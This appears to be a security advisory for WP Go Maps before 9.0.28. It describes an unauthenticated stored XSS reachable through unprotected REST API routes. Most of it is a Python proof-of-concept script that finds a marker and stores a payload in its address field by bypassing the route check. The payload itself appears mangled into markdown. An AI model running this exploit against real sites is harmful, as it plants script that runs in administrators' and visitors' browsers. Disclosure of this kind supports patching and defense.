WP Go Maps < 9.0.28 - Unauthenticated Stored XSS

Description The plugin does not properly protect most of its REST API routes, which attackers can abuse to store malicious HTML/Javascript on the site.

PoC

Run the following Python script, then visit https://vulnerable-site.tld/wp-admin/admin.php?page=wp-google-maps-menu&amp;action;=edit&amp;map;_id=1. Alternatively, visit the page where the map is displayed after the fact and click on the affected marker to trigger the XSS. import sys import requests if len(sys.argv) != 2: print(f'{sys.argv[0]} ') sys.exit() url = sys.argv[1].rstrip('/') # Get list of existing markers res = requests.get(f'{url}/wp-json/wpgmza/v1/markers').json() if len(res) == 0: print('# No markers found! Make sure the plugin is properly setup.') sys.exit() marker_id = res[0]['id'] print(f'# Found marker ID #{marker_id}, using it to demonstrate the exploit') print('# Tricking the POST section of the endpoint to store our XSS payload..') body = { 'address': '![](x)' } requests.post(f'{url}/wp-json/wpgmzA/v1/markers?_method=get&random;=/wpgmza/v1/markers/{marker_id}', data=body)